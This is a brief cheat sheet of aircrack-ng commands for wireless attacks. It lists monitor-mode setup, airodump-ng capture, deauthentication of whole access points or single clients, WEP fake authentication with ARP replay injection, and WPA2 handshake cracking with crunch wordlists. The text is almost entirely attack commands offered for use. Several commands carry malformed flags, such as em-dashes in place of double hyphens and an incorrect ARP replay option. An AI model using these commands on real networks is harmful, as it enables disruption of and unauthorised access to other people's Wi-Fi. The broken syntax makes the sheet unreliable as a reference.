Control Network Interface & Switch Network Modes
//Check Wireless Interface
iwconfig
// Turn Off Interface
airmon-ng check kill
ifconfig <interface> down //(use if check kill doesnt work)
// Switch to monitor mode
airmon-ng start <interface>
// Switch Back to Managed Mode & Restart
airmon-ng stop <interface>
service NetworkManager start
Airodump - Analyse
// Analyse Interface
airodump-ng <interface>
// Analyse Interface's Channel & SSID
airodump-ng -channel <channel> —bssid <bssid> —write <file_name> <interface>
Attack Phase
Aireplay - Deauth Attack
// Deauth on a entire Router using its BSSID
aireplay-ng —deauth <packets> -a <AP> <interface>
// Deauth speific target on Router
aireplay-ng —deauth <packets> -a <AP> -c <target> <interface>
WEP Cracking - Fake Auth & Packet Injection [Aireplay]
// Fake Authetication
aireplay-ng —fakeauth 0 -a <target_MAC> -h <kali_MAC> <interface>
// Packet Injection (ARP)
aireplay-ng —arpreplay-ng -b <target_MAC> -h <kali_MAC> <interface>
WPA2 Cracking [Aircrack]
// Generate Handshake File
-- Use Deauth on Target to generate handshake file [Airodump + Aireplay]
// Generate Wordlist [Crunch]
crunch <min> <max> <char> -t <pattern> -o file
// Crack using Handshake File & Wordlist
aircrack-ng <handshake_file> -w <wordlist>